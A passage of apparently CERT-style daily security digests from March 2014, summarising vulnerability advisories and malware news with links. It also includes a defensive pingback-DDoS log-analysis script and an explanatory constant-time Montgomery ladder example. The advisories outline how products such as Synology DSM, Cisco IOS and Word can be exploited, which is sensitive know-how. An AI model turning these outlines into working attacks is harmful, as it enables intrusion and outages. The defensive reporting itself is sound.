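    '192.0.2.6 - - [24/Mar/2014:10:02:05 +0100] "POST /xmlrpc.php HTTP/1.1" 200 370 "-" "Windows Live Writer"',
]

if __name__ == "__main__":
    for k, v in analyse(SAMPLE_LOG).items():
        print(k, v)
```

On a reflector the durable fix is to disable pingbacks (the xmlrpc "pingback.ping" method) unless they are genuinely used; on the victim side the User-Agent is a clean key for rate limiting, since legitimate pingback verification fetches are rare and never arrive from hundreds of blogs at once.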
*** Bugtraq: CVE-2013-6955 Synology DSM remote code execution ***
---------------------------------------------
webman/imageSelector.cgi in Synology DiskStation Manager (DSM) 4.0 before 4.0-2259, 4.2 before 4.2-3243, and 4.3 before 4.3-3810 Update 1 allows remote attackers to append data to arbitrary files, and consequently execute arbitrary code, via a pathname in the SLICEUPLOAD X-TMP-FILE HTTP header.
---------------------------------------------
http://www.securityfocus.com/archive/1/531602
*** OpenSSL 1.0.0l cache side-channel attack ***
---------------------------------------------
Topic: OpenSSL 1.0.0l cache side-channel attack Risk: Medium Text:The Montgomery ladder implementation in OpenSSL through 1.0.0l does not ensure that certain swap operations have a constant-tim...
---------------------------------------------
http://cxsecurity.com/issue/WLB-2014030197
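The advisory's point is that a Montgomery ladder only hides the secret scalar if the per-bit swap of its two accumulators takes the same instructions and touches the same memory whichever way the bit falls. The example below, added here and not taken from OpenSSL, shows a branchy swap beside a mask-based one and drives a ladder with either. It uses modular exponentiation rather than the elliptic-curve arithmetic OpenSSL's ladder operates on, because the ladder structure and the swap are identical and the modular version is self-contained; Python integers are not themselves constant-time, so this illustrates the technique rather than providing a side-channel-free primitive.

```python
def cswap_branchy(swap, a, b, width):
    """Conditional swap with a data-dependent branch.

    The code path taken (and the cache lines it touches) depends on `swap`,
    which in a ladder is one bit of the secret scalar.
    """
    if swap:
        return b, a
    return a, b


def cswap_masked(swap, a, b, width):
    """Branch-free conditional swap on `width`-bit values.

    mask is all-ones when swap == 1 and all-zeros when swap == 0, so the same
    XORs run either way and the result does not depend on a branch.
    """
    mask = (-swap) & ((1 << width) - 1)
    t = (a ^ b) & mask
    return a ^ t, b ^ t


def ladder_modexp(base, exp, mod, cswap):
    """Montgomery ladder for base**exp mod mod.

    Every iteration performs exactly one multiply and one square; the only
    bit-dependent operation is the swap, which is why its constant-timeness
    decides whether the scalar leaks.
    """
    width = mod.bit_length()
    r0, r1 = 1, base % mod
    for i in reversed(range(exp.bit_length())):
        bit = (exp >> i) & 1
        r0, r1 = cswap(bit, r0, r1, width)
        r1 = (r0 * r1) % mod      # "multiply" step
        r0 = (r0 * r0) % mod      # "square" step
        r0, r1 = cswap(bit, r0, r1, width)
    return r0


if __name__ == "__main__":
    # Constructed toy parameters; any (base, exp, mod) works.
    print(ladder_modexp(4, 13, 497, cswap_branchy), pow(4, 13, 497))   # 445 445
    print(ladder_modexp(4, 13, 497, cswap_masked), pow(4, 13, 497))    # 445 445
```

Both swaps give the same answer, which is exactly why the defect is invisible to functional tests; it only shows up when an attacker on the same core watches cache timing while the ladder runs.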
*** Xen HVMOP_set_mem_access Input Validation Flaw Lets Local Guest Users Deny Service on the Host System ***
---------------------------------------------
A local user on the guest operating system can cause denial of service conditions on the host operating system.
The HVMOP_set_mem_access HVM control operations does not properly validate input size. A local administrative user on an HVM guest operating system can consume excessive CPU resources on the host operating system.
On version 4.2, only 64-bit versions of the hypervisor are affected.
Device model emulators (qemu-dm) are affected.
---------------------------------------------
http://www.securitytracker.com/id/1029956
*** Walkthrough of a Recent Zbot Infection and associated CnC Server ***
---------------------------------------------
During routine ThreatLabZ log analysis, we encountered the following malicious Zbot executable connecting back to its CnC and exfiltrating data via POST requests.
---------------------------------------------
http://feedproxy.google.com/~r/zscaler/research/~3/kygTD5dMmHo/walkthrough-…
*** MIT Researchers Create Platform To Build Secure Web Apps That Never Leak Data ***
---------------------------------------------
rjmarvin writes: "Researchers in the MIT Computer Science and Artificial Intelligence Laboratory have developed a platform for building secure web applications and services that never decrypt or leak data. MIT researcher Raluca Ada Popa, who previously worked on the Google and SAP-adopted CryptoDB, and her team, have put a longstanding philosophy into practice: to never store unencrypted data on servers. They've redesigned the entire approach to securing online data by creating Mylar, which
---------------------------------------------
http://rss.slashdot.org/~r/Slashdot/slashdot/~3/QIuCSrAxslY/story01.htm
*** PAM timestamp internals bypass authentication ***
---------------------------------------------
Topic: PAM timestamp internals bypass authentication
Risk: Low
Text:Hi When playing with some PAM modules for my own projects, I came across some implications of pam_timestamp (which is part ...
---------------------------------------------
http://cxsecurity.com/issue/WLB-2014030216
*** Nmap creator reboots Full Disclosure ***
---------------------------------------------
Gordon 'Fyodor' Lyon has revived the Full Disclosure mailing list, which had been shut down unexpectedly. He has plenty of experience administering mailing lists and no fear of legal threats, the security expert says.
---------------------------------------------
http://www.heise.de/security/meldung/Nmap-Erfinder-rebootet-Full-Disclosure…
*** TYPO3 CMS 6.2 LTS is now available ***
---------------------------------------------
... TYPO3 CMS 6.2 LTS, which was released today. As the second TYPO3 release with long-term support (LTS), TYPO3 CMS 6.2 LTS will receive at least three years of support from the development team behind the open-source software.
---------------------------------------------
http://typo3.org/news/article/typo3-presents-the-latest-version-of-its-free…
*** Change your VoIP password now: criminals are exploiting captured Fritzbox data ***
---------------------------------------------
The Fritzbox attackers apparently collected credentials unnoticed for a long time without using them. For users this now has an ugly sequel, because most of the passwords still work. The damage runs into the hundreds of thousands.
---------------------------------------------
http://www.heise.de/security/meldung/Jetzt-VoIP-Passwort-aendern-Kriminelle…
*** Splunk Unspecified Cross-Site Scripting Vulnerability ***
---------------------------------------------
A vulnerability has been reported in Splunk, which can be exploited by malicious people to conduct cross-site scripting attacks.
Certain unspecified input is not properly sanitised before being returned to the user. This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site.
The vulnerability is reported in versions prior to 5.0.8.
---------------------------------------------
https://secunia.com/advisories/57554
*** libcURL Connection Re-use and Certificate Verification Security Issues ***
---------------------------------------------
Multiple security issues have been reported in libcURL, which can be exploited by malicious people to conduct spoofing attacks and bypass certain security restrictions.
---------------------------------------------
https://secunia.com/advisories/57434
*** 10 rules of thumb of internet safety ***
---------------------------------------------
Malicious parties on the internet try to gain access to your computer, tablet or mobile phone and to intercept personal data. Malware, phishing and spam are frequently occurring threats. These 10 rules of thumb provide a basis to protect yourself against these threats.
---------------------------------------------
http://www.ncsc.nl/english/services/expertise-advice/knowledge-sharing/fact…
*** New Metasploit 4.9 Helps Evade Anti-Virus Solutions, Test Network Segmentation, and Increase Productivity for Penetration Testers ***
---------------------------------------------
Metasploit 4.9 helps penetration testers evade anti-virus solutions, generate payloads, test network segmentation, and generally increase productivity through updated automation and reporting features. Since version 4.8, Metasploit has added 67 new exploits and 51 auxiliary and post-exploitation modules to both its commercial and open source editions, bringing our total module count up to 1,974. The new version is available immediately.
---------------------------------------------
https://community.rapid7.com/community/metasploit/blog/2014/03/26/new-metas…
*** [Honeypot Alert] JCE Joomla Extension Attacks ***
---------------------------------------------
Our web honeypots picked up some increased exploit attempts for an old Joomla Content Editor (JCE) Extension vulnerability. Although this vulnerability is a few years old, botnet owners are heavily scanning for sites that are vulnerable and attempting to exploit them.
---------------------------------------------
http://feedproxy.google.com/~r/SpiderlabsAnterior/~3/v7CME1mpcfQ/honeypot-a…
*** Cisco IOS Software SSL VPN Denial of Service Vulnerability ***
---------------------------------------------
A vulnerability in the Secure Sockets Layer (SSL) VPN subsystem of Cisco IOS Software could allow an unauthenticated, remote attacker to cause a denial of service (DoS) condition.
The vulnerability is due to a failure to process certain types of HTTP requests. To exploit the vulnerability, an attacker could submit crafted requests designed to consume memory to an affected device. An exploit could allow the attacker to consume and fragment memory on the affected device. This may cause reduced performance, a failure of certain processes, or a restart of the affected device.
---------------------------------------------
http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-…
*** Cisco IOS Software Session Initiation Protocol Denial of Service Vulnerability ***
---------------------------------------------
A vulnerability in the Session Initiation Protocol (SIP) implementation in Cisco IOS Software and Cisco IOS XE Software could allow an unauthenticated, remote attacker to cause a reload of an affected device. To exploit this vulnerability, affected devices must be configured to process SIP messages. Limited Cisco IOS Software and Cisco IOS XE Software releases are affected.
---------------------------------------------
http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-…
*** Cisco IOS Software Crafted IPv6 Packet Denial of Service Vulnerability ***
---------------------------------------------
A vulnerability in the implementation of the IP version 6 (IPv6) protocol stack in Cisco IOS Software and Cisco IOS XE Software could allow an unauthenticated, remote attacker to cause I/O memory depletion on an affected device that has IPv6 enabled. The vulnerability is triggered when an affected device processes a malformed IPv6 packet.
---------------------------------------------
http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-…
*** Cisco IOS Software Network Address Translation Vulnerabilities ***
---------------------------------------------
The Cisco IOS Software implementation of the Network Address Translation (NAT) feature contains two vulnerabilities when translating IP packets that could allow an unauthenticated, remote attacker to cause a denial of service condition.
---------------------------------------------
http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-…
*** Cisco IOS Software Internet Key Exchange Version 2 Denial of Service Vulnerability ***
---------------------------------------------
A vulnerability in the Internet Key Exchange Version 2 (IKEv2) module of Cisco IOS Software and Cisco IOS XE Software could allow an unauthenticated, remote attacker to cause a reload of the affected device that would lead to a denial of service (DoS) condition.
The vulnerability is due to how an affected device processes certain malformed IKEv2 packets. An attacker could exploit this vulnerability by sending malformed IKEv2 packets to an affected device to be processed. An exploit could allow the attacker to cause a reload of the affected device that would lead to a DoS condition.
---------------------------------------------
http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-…
*** Web Browser Security Revisited (Part 5) ***
---------------------------------------------
In Part 1 of this series, we discussed the importance of web browser security and some security-related issues that are common to all or many of the popular browsers today. In Part 2, we talked about some specific security mechanisms that are built into Internet Explorer and how they're implemented. In Part 3, we looked at how to configure IE for best security. In Part 4, we examined how to do the same with Google Chrome. This time, we'll look at ... Chrome for Business.
---------------------------------------------
http://www.windowsecurity.com/articles-tutorials/Web_Application_Security/w…
*** Vuln: Apple Mac OS X APPLE-SA-2014-02-25-1 Multiple Security Vulnerabilities ***
---------------------------------------------
Apple Mac OS X is prone to multiple vulnerabilities.
The update addresses new vulnerabilities that affect ATS, CFNetwork Cookies, CoreAnimation, CoreText, Date and Time, curl, QuickTime, QuickLook, Finder, and File Bookmark components.
Attackers can exploit these issues to execute arbitrary code, gain unauthorized access, bypass security restrictions, and perform other attacks. Failed attacks may cause denial-of-service conditions.
These issues affect OS X versions prior to 10.9.2.
---------------------------------------------
http://www.securityfocus.com/bid/65777
=======================
= End-of-Shift report =
=======================
Timeframe: Montag 24-03-2014 18:00 − Dienstag 25-03-2014 18:00
Handler: Robert Waldner
Co-Handler: n/a
*** Microsoft Security Advisory (2953095): Vulnerability in Microsoft Word Could Allow Remote Code Execution - Version: 1.0 ***
---------------------------------------------
Microsoft is aware of a vulnerability affecting supported versions of Microsoft Word. At this time, we are aware of limited, targeted attacks directed at Microsoft Word 2010. The vulnerability could allow remote code execution if a user opens a specially crafted RTF file using an affected version of Microsoft Word, or previews or opens a specially crafted RTF email message in Microsoft Outlook while using Microsoft Word as the email viewer.
---------------------------------------------
http://technet.microsoft.com/en-us/security/advisory/2953095
*** Security Advisory 2953095: recommendation to stay protected and for detections ***
---------------------------------------------
Today, Microsoft released Security Advisory 2953095 to notify customers of a vulnerability in Microsoft Word. At this time, we are aware of limited, targeted attacks directed at Microsoft Word 2010. This blog will discuss mitigations and temporary defensive strategies that will help customers to protect themselves while we are working on a security update. This blog also provides some preliminary details of the exploit code observed in the wild. Mitigations and Workaround The in the wild
---------------------------------------------
http://blogs.technet.com/b/srd/archive/2014/03/24/security-advisory-2953095…
*** [dos] - Windows Media Player 11.0.5721.5230 - Memory Corruption PoC ***
---------------------------------------------
#[+] Exploit Title: Windows Media Player 11.0.5721.5230 Memory Corruption PoC
#[+] Date: 22-03-2014
#[+] Category: DoS/PoC
#[+] Tested on: WinXp/Windows 7 Pro
---------------------------------------------
http://www.exploit-db.com/exploits/32477
*** Security Notice- Allegro RomPager Information Disclosure Vulnerability in Multiple Huawei Routers ***
---------------------------------------------
Huawei has noticed an information disclosure vulnerability on the RomPager embedded web server, which is developed by Allegro. The vulnerability affects Huawei HG520c, MT880, and MT886 access routers.
---------------------------------------------
http://www.huawei.com/en/security/psirt/security-bulletins/security-notices…
*** Bugtraq: Deutsche Telekom CERT Advisory [DTC-A-20140324-001] vulnerabilities in cacti ***
---------------------------------------------
Summary:
Three vulnerabilities were found in cacti version 0.8.7g.
The vulnerabilities are:
1) Stored Cross-Site Scripting (XSS) (via URL)
2) Missing CSRF (Cross-Site Request Forgery) token allows execution of arbitrary commands
3) The use of exec-like function calls without safety checks allow arbitrary commands
---------------------------------------------
http://www.securityfocus.com/archive/1/531588
*** Bugtraq: Deutsche Telekom CERT Advisory [DTC-A-20140324-003] vulnerabilities in icinga ***
---------------------------------------------
Two vulnerabilities were found in icinga version 1.9.1.
These vulnerabilities are:
1) several buffer overflows
2) Off-by-one memory access
---------------------------------------------
http://www.securityfocus.com/archive/1/531593
*** Bugtraq: Deutsche Telekom CERT Advisory [DTC-A-20140324-002] vulnerabilities in check_mk ***
---------------------------------------------
Several vulnerabilities were found in check_mk version 1.2.2p2.
The vulnerabilities are:
1 - Reflected Cross-Site Scripting (XSS)
2 - Stored Cross-Site Scripting (XSS) (via URL)
3 - Stored Cross-Site Scripting (XSS) (via external data, no link necessary)
4 - Stored Cross-Site Scripting (XSS) (via external data on service port, no link necessary)
5 - Missing CSRF (Cross-Site Request Forgery) token allows execution of arbitrary commands
6 - Multiple use of exec-like function calls which allow arbitrary commands
7 - Deletion of arbitrary files
---------------------------------------------
http://www.securityfocus.com/archive/1/531594
*** Net-snmp snmptrapd Community String Processing Lets Remote Users Deny Service ***
---------------------------------------------
A remote user can send a specially crafted SNMP trap request with an empty community string to trigger a flaw in newSVpv() and cause the target snmptrapd service to crash.
Systems with the Perl handler enabled are affected.
---------------------------------------------
http://www.securitytracker.com/id/1029950
*** Trojan.PWS.OSMP.21 infects payment terminals ***
---------------------------------------------
March 25, 2014 Home users aren't the only ones being targeted by today's threats - various financial organisations are receiving their own share of attention from criminals who are crafting malicious applications for ATMs and payment terminals. Doctor Web has issued a warning regarding one such Trojan, namely, Trojan.PWS.OSMP.21. This malware is infecting the terminals of a major Russian payment system.
---------------------------------------------
http://news.drweb.com/show/?i=4259&lng=en&c=9
*** RSA BSAFE Micro Edition Suite (MES) 4.0.x Denial Of Service ***
---------------------------------------------
Summary:
RSA BSAFE MES 4.0.5 contains fix for a security vulnerability that could potentially be exploited by malicious users to
deny access to the affected system.
Details:
This vulnerability may cause unpredictable application behavior resulting in a server crash due to faulty certificate
chain processing logic.
---------------------------------------------
http://cxsecurity.com/issue/WLB-2014030193
*** PHP Fileinfo libmagic AWK File Processing Denial of Service Vulnerability ***
---------------------------------------------
A vulnerability has been reported in PHP, which can be exploited by malicious people to cause a DoS (Denial of Service).
The vulnerability is caused due to an error in the libmagic library bundled in the Fileinfo extension when processing certain AWK scripts, which can be exploited to cause excessive CPU resources consumption via a specially crafted AWK script file.
---------------------------------------------
https://secunia.com/advisories/57564
*** OpenVZ update for kernel ***
---------------------------------------------
OpenVZ has issued an update for kernel. This fixes multiple vulnerabilities, which can be exploited by malicious people to potentially compromise a vulnerable system.
---------------------------------------------
https://secunia.com/advisories/57573
*** Password Hashing Competition ***
---------------------------------------------
There's a private competition to identify new password hashing schemes. Submissions are due at the end of the month.
---------------------------------------------
https://www.schneier.com/blog/archives/2014/03/password_hashin.html
=======================
= End-of-Shift report =
=======================
Timeframe: Freitag 21-03-2014 18:00 − Montag 24-03-2014 18:00
Handler: Robert Waldner
Co-Handler: n/a
*** NSA Targets Sys Admins to Infiltrate Networks ***
---------------------------------------------
The latest Snowden documents show how the National Security Agency targets system administrators, in particular their personal email and social media accounts, in order to access target networks.
---------------------------------------------
http://threatpost.com/nsa-targets-sys-admins-to-infiltrate-networks/104953
*** IBM Security Bulletin: IBM Security Directory Server can be affected by a vulnerability in IBM WebSphere Application Server (CVE-2014-0411) ***
---------------------------------------------
The IBM WebSphere Application Server component provided with IBM Security Directory Server is vulnerable to a transport layer security (TLS) timing attack.
---------------------------------------------
https://www-304.ibm.com/connections/blogs/PSIRT/entry/ibm_security_bulletin…
*** BlackOS software package automates website hacking, costs $3,800 a year ***
---------------------------------------------
An updated version of a malicious software package designed to automate the process of hacking websites is being offered up on underground markets for $3,800 a year, according to a blog by Trend Micro.
---------------------------------------------
http://feedproxy.google.com/~r/SCMagazineHome/~3/yw9wyT8CoMQ/
*** WPA2 Wireless Security Crackable With "Relative Ease" ***
---------------------------------------------
An anonymous reader writes "Achilleas Tsitroulis of Brunel University, UK, Dimitris Lampoudis of the University of Macedonia, Greece and Emmanuel Tsekleves of Lancaster University, UK, have investigated the vulnerabilities in WPA2 and present its weakness. They say that this wireless security system might now be breached with relative ease [original, paywalled paper] by a malicious attack on a network.
---------------------------------------------
http://rss.slashdot.org/~r/Slashdot/slashdot/~3/GNlVmrhVOM4/story01.htm
*** Android update process gives malware a leg-up to evil: Indiana U ***
---------------------------------------------
Old apps get access to privileges that didn't exist when they were written. Researchers from Indiana University Bloomington have tagged a vulnerability in the way Android handles updates, which they say puts practically every Android device at risk of malicious software.…
---------------------------------------------
http://go.theregister.com/feed/www.theregister.co.uk/2014/03/23/android_upd…
*** AWS urges developers to scrub GitHub of secret keys ***
---------------------------------------------
Devs hit with unexpected bills after leaving secret keys exposed. Amazon Web Services (AWS) is urging developers using the code sharing site GitHub to check their posts to ensure they haven't inadvertently exposed their log-in credentials.
---------------------------------------------
http://www.itnews.com.au/News/375785,aws-urges-developers-to-scrub-github-o…
*** D-Link DIR-600L Cross-Site Request Forgery Vulnerability ***
---------------------------------------------
A vulnerability has been reported in D-Link DIR-600L, which can be exploited by malicious people to conduct cross-site request forgery attacks.
The application allows users to perform certain actions via HTTP requests without performing proper validity checks to verify the requests. This can be exploited to e.g. change administrative credentials when a logged-in user visits a specially crafted web page.
---------------------------------------------
https://secunia.com/advisories/57392
*** Array Networks vxAG / vAPV Undocumented Accounts Security Issues ***
---------------------------------------------
Some security issues have been reported in Array Networks vxAG and vAPV, which can be exploited by malicious people to bypass certain security restrictions.
The security issues are caused due to the device using certain undocumented user accounts with default credentials, which can be exploited to gain otherwise restricted access to the device.
---------------------------------------------
https://secunia.com/advisories/57442
*** PayPal for Android SSL Certificate Validation Security Issue ***
---------------------------------------------
MWR InfoSecurity has reported a security issue in PayPal for Android, which can be exploited by malicious people to conduct spoofing attacks.
The security issue is caused due to an error when verifying server SSL certificate within the WebHybridClient class and can be exploited to spoof a HTTPS connection and e.g. conduct Man-in-the-Middle (MitM) attacks.
---------------------------------------------
https://secunia.com/advisories/57351
*** php-font-lib "name" Cross-Site Scripting Vulnerability ***
---------------------------------------------
Daniel C. Marques has reported a vulnerability in php-font-lib, which can be exploited by malicious people to conduct cross-site scripting attacks.
Input passed via the "name" GET parameter to www/make_subset.php is not properly sanitised before being returned to the user. This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site.
---------------------------------------------
https://secunia.com/advisories/57558
=======================
= End-of-Shift report =
=======================
Timeframe: Donnerstag 20-03-2014 18:00 − Freitag 21-03-2014 18:00
Handler: Robert Waldner
Co-Handler: Alexander Riepl
*** Taken in phishing attack, Microsoft's unmentionables aired by hacktivists ***
---------------------------------------------
If Microsoft and eBay aren't safe from social engineering attacks, who is?
---------------------------------------------
http://feeds.arstechnica.com/~r/arstechnica/security/~3/B9IE0Uei57U/
*** Kaspersky Internet Security Regular Expression Patterns Processing Denial of Service Vulnerability ***
---------------------------------------------
CXsecurity has discovered a vulnerability in Kaspersky Internet Security, which can be exploited by malicious people to cause a DoS (Denial of Service).
The vulnerability is caused due to an error when processing regular expression patterns and can be exploited to exhaust CPU resources and render the system unusable.
---------------------------------------------
https://secunia.com/advisories/57316
*** DotNetNuke Unspecified Script Insertion Vulnerability ***
---------------------------------------------
A vulnerability has been reported in DotNetNuke, which can be exploited by malicious users to conduct script insertion attacks.
Certain unspecified input is not properly sanitised before being used. This can be exploited to insert arbitrary HTML and script code, which will be executed in a user's browser session in context of an affected site when the malicious data is being viewed.
---------------------------------------------
https://secunia.com/advisories/57429
*** WordPress WP-Filebase Download Manager Plugin Arbitrary Code Execution Vulnerability ***
---------------------------------------------
A vulnerability has been reported in the WP-Filebase Download Manager plugin for WordPress, which can be exploited by malicious users to compromise a vulnerable system.
...
Successful exploitation of this vulnerability requires access rights to upload files (e.g. "Editor" access rights).
The vulnerability is reported in version 0.3.0.03. Prior versions may also be affected.
---------------------------------------------
https://secunia.com/advisories/57456
*** Zeus variant blocks user activity with full-screen pop-ups ***
---------------------------------------------
Infected users are forced to contend with open windows, which are actually legitimate sites being displayed on their desktops.
---------------------------------------------
http://feedproxy.google.com/~r/SCMagazineHome/~3/KHHSZFOdcH0/
*** A peek inside a modular, Tor C&C enabled, Bitcoin mining malware bot ***
---------------------------------------------
Cybercriminals continue to maliciously 'innovate', further confirming the TTP (tactics, techniques and procedure) observations we made in our Cybercrime Trends 2013 assessment back in December, 2013, namely, that the diverse cybercrime ecosystem is poised for exponential growth. Standardizing the very basics of fraudulent and malicious operations, throughout the years, cybercriminals have successfully achieved a state of malicious economies of scale...
---------------------------------------------
http://feedproxy.google.com/~r/WebrootThreatBlog/~3/V6XSH_U-eoU/
*** Siemens SIMATIC S7-1200 Improper Input Validation Vulnerabilities ***
---------------------------------------------
OVERVIEW
Siemens has reported two improper input validation vulnerabilities discovered separately by Prof. Dr. Hartmut Pohl of softScheck GmbH and Arne Vidström of the Swedish Defence Research Agency (FOI) in Siemens' SIMATIC S7-1200 PLC. Siemens has produced a new version that mitigates these vulnerabilities. These vulnerabilities could be exploited remotely.
AFFECTED PRODUCTS
The following SIMATIC S7-1200 PLC versions are affected:
---------------------------------------------
http://ics-cert.us-cert.gov/advisories/ICSA-14-079-01
*** Siemens SIMATIC S7-1200 Vulnerabilities ***
---------------------------------------------
OVERVIEW
Siemens, Ralf Spenneberg of OpenSource Training, Lucian Cojocar of EURECOM, Sascha Zinke from the FU Berlin's work team SCADACS, and Positive Technologies' researchers (Alexey Osipov and Alex Timorin) have identified six vulnerabilities in the Siemens SIMATIC S7-1200 CPU family. Siemens has produced a new product release that mitigates these vulnerabilities. These vulnerabilities could be exploited remotely.
---------------------------------------------
http://ics-cert.us-cert.gov/advisories/ICSA-14-079-02
*** Cisco AsyncOS Patch, (Fri, Mar 21st) ***
---------------------------------------------
Cisco released a patch for AsyncOS, the operating system used in its E-Mail Security Appliance (ESA) and Security Management Appliance (SMA). The vulnerability is exploited by an authenticated attacker uploading a crafted blocklist file. The file has to be uploaded via FTP, so this vulnerability is only exploitable if the FTP service is enabled. Once the blacklist is parsed, arbitrary commands are executed. This sounds like an OS command injection vulnerability. The parameters (assumed to be
---------------------------------------------
http://isc.sans.edu/diary.html?storyid=17839&rss
*** Linux Kernel Netfilter DCCP Processing Flaw Lets Remote Users Execute Arbitrary Code ***
---------------------------------------------
Description: A vulnerability was reported in the Linux Kernel. A remote user can execute arbitrary code on the target system.
A remote user can send specially crafted DCCP data to trigger a memory corruption flaw in 'nf_conntrack_proto_dccp.c' and execute arbitrary code on the target system.
---------------------------------------------
http://www.securitytracker.com/id/1029945
*** Horde Framework Unserialize PHP Code Execution ***
---------------------------------------------
Topic: Horde Framework Unserialize PHP Code Execution
Risk: High
Text: # This module requires Metasploit
---------------------------------------------
http://cxsecurity.com/issue/WLB-2014030175
*** Monitoring for unusual network traffic key to banking botnet detection ***
---------------------------------------------
Malware authors have had great success targeting financial institutions in recent years, and in turn those organizations have a vested interest in improving their banking botnet detection capabilities. However, one expert says financial firms are failing because they ignore unusual network traffic.
---------------------------------------------
http://searchsecurity.techtarget.com/news/2240216637/Monitoring-for-unusual…
*** Nokia X Android smartphone security features detailed ***
---------------------------------------------
... the Nokia X comes with the required security features to protect the data stored on the device without downloading third-party security apps. The three main ways to protect the data on the Nokia X smartphone are screen security, encryption, and SIM card lock.
---------------------------------------------
http://gadgets.ndtv.com/mobiles/news/nokia-x-android-smartphone-security-fe…
*** Linux Worm Darlloz Infects over 31,000 Devices in Four Months ***
---------------------------------------------
The worm is designed to infect computers running Intel x86 architectures, but it's also capable of infecting devices running MIPS, ARM, PowerPC architectures. Routers, set-top boxes and other devices usually have this kind of architecture. Based on its investigation, Symantec has determined that the main goal of Darlloz is to abuse infected devices for crypto-currency mining. Once it's installed on a computer, the worm installs open source mining software (cpuminer).
---------------------------------------------
http://news.softpedia.com/news/Linux-Worm-Darlloz-Infects-over-31-000-Devic…
*** Mass-Produced ATM Skimmers, Rogue PoS Terminals via 3D Printing? ***
---------------------------------------------
On several underground forums, a cybercriminal named gripper is selling ATM skimmers and fake POS terminals, and is making some very bold claims doing so:
Figure 1. Underground advertisement.
The cybercriminal claims that he can mass-produce VeriFone VerixV point-of-sale (PoS) devices. (Verifone is a US-based provider of POS terminals.) Some specific VeriFone products such as the Vx510...
---------------------------------------------
http://feeds.trendmicro.com/~r/Anti-MalwareBlog/~3/YmksHI4j1OM/
*** Spotlight on Java SE 8 Security ***
---------------------------------------------
March 18, 2014 was the long anticipated release of Java SE 8. I thought I would spotlight some of the key security features of Java 8 for readers. First, many are not aware of security improvements made to Java 7. Let's begin with a quick review of the Java SE 7 security features that were rolled into Java SE 8.
---------------------------------------------
http://www.securitycurmudgeon.com/2014/03/20/spotlight-on-java-se-8-securit…
*** IBM Security Bulletin: IBM WebSphere MQ Internet Pass-Thru - Potential denial of service on the command port listener (CVE-2013-5401) ***
---------------------------------------------
A denial of service vulnerability exists and could be exploited by a remotely connected user to stop the remote administration service.
CVE(s): CVE-2013-5401
Affected product(s) and affected version(s): WebSphere MQIPT 2.1.0.0, WebSphere MQIPT 2.0.x
Refer to the following reference URLs for remediation and additional vulnerability details:
Source Bulletin: http://www-01.ibm.com/support/docview.wss?uid=swg21666863
X-Force Database: http://xforce.iss.net/xforce/xfdb/87297
---------------------------------------------
https://www-304.ibm.com/connections/blogs/PSIRT/entry/ibm_security_bulletin…
*** OpenSSL ECDSA Nonces Recovery Weakness ***
---------------------------------------------
Yuval Yarom and Naomi Benger have reported a weakness in OpenSSL, which can be exploited by malicious, local users to disclose certain sensitive information.
---------------------------------------------
https://secunia.com/advisories/57091
*** OpenSSH "child_set_env()" Security Bypass Security Issue ***
---------------------------------------------
The security issue is caused due to an error within the "child_set_env()" function (usr.bin/ssh/session.c) and can be exploited to bypass intended environment restrictions by using a substring before a wildcard character.
---------------------------------------------
https://secunia.com/advisories/57488
*** Oracle VirtualBox 3D Acceleration Multiple Privilege Escalation Vulnerabilities ***
---------------------------------------------
Core Security has reported multiple vulnerabilities in Oracle VirtualBox, which can be exploited by malicious, local users in a guest virtual machine to gain escalated privileges.
---------------------------------------------
https://secunia.com/advisories/57384
*** Cisco Hosted Collaboration Solution Packet Processing Denial of Service Vulnerability ***
---------------------------------------------
A vulnerability has been reported in Cisco Hosted Collaboration Solution, which can be exploited by malicious people to cause a DoS (Denial of Service).
---------------------------------------------
https://secunia.com/advisories/57496
*** Video shows jailbreak of iOS 7.1 ***
---------------------------------------------
A developer has demonstrated his work on a jailbreak for iOS 7.1. With the latest iOS update, Apple had closed the vulnerabilities that were used for the previous jailbreak.
---------------------------------------------
http://www.heise.de/newsticker/meldung/Video-zeigt-Jailbreak-von-iOS-7-1-21…
=======================
= End-of-Shift report =
=======================
Timeframe: Mittwoch 19-03-2014 18:00 − Donnerstag 20-03-2014 18:00
Handler: Alexander Riepl
Co-Handler: Stephan Richter
*** ZBOT Adds Clickbot Routine To Arsenal ***
---------------------------------------------
The ZeuS/ZBOT malware family is probably one of the most well-known malware families today . It is normally known for stealing credentials associated with online banking accounts. However, ZBOT is no one-trick pony. Some ZBOT variants perform other routines like downloading or dropping other threats like ransomware. We recently came across one variant detected as TROJ_ZCLICK.A,...
---------------------------------------------
http://feeds.trendmicro.com/~r/Anti-MalwareBlog/~3/rrelQiGbzao/
*** New BlackOS Software Package Sold In Underground Forums ***
---------------------------------------------
We recently came across this particular post in an underground forum:
Figure 1. Underground forum post
This particular post in Russian was advertising a new product, known as "BlackOS". Contrary to the name, it is not an operating system. However, it is definitely "black", or malicious: it is used to manage and redirect Internet traffic...
---------------------------------------------
http://feeds.trendmicro.com/~r/Anti-MalwareBlog/~3/mA8O58qz-TQ/
*** Phishing: Hacked EA server hosts fake Apple website ***
---------------------------------------------
Criminal hackers have placed a fake website on servers of the games publisher Electronic Arts that asks for Apple IDs together with passwords and credit card information. How many users have entered their data there is not known.
---------------------------------------------
http://www.golem.de/news/phishing-gehackter-ea-server-hostet-falsche-apple-…
*** "goto fail": Apple urges users to update ***
---------------------------------------------
The Mac maker is now calling on users to install the update to OS X 10.9.2 as soon as possible, if they have not already done so. Older versions of OS X Mavericks and iOS have a serious SSL vulnerability.
---------------------------------------------
http://www.heise.de/security/meldung/goto-fail-Apple-draengt-Nutzer-zum-Upd…
*** Android: security holes due to missing updates remain a problem ***
---------------------------------------------
70 percent of all Android devices worldwide have a browser vulnerability, a researcher believes. Simply visiting a website is enough to exploit it.
---------------------------------------------
http://www.heise.de/newsticker/meldung/Android-Sicherheitsluecken-wegen-feh…
*** Analysis: Spam report: February 2014 ***
---------------------------------------------
The share of spam in global email traffic decreased by 7.6 percentage points and averaged 65.7% in January. As forecasted, the drop in the share of spam was due to a lull early in January when there is less business activity and a large number of botnets are turned off.
---------------------------------------------
http://www.securelist.com/en/analysis/204792328/Spam_report_February_2014
*** Protocol analysis: Cheating in Quizduell ***
---------------------------------------------
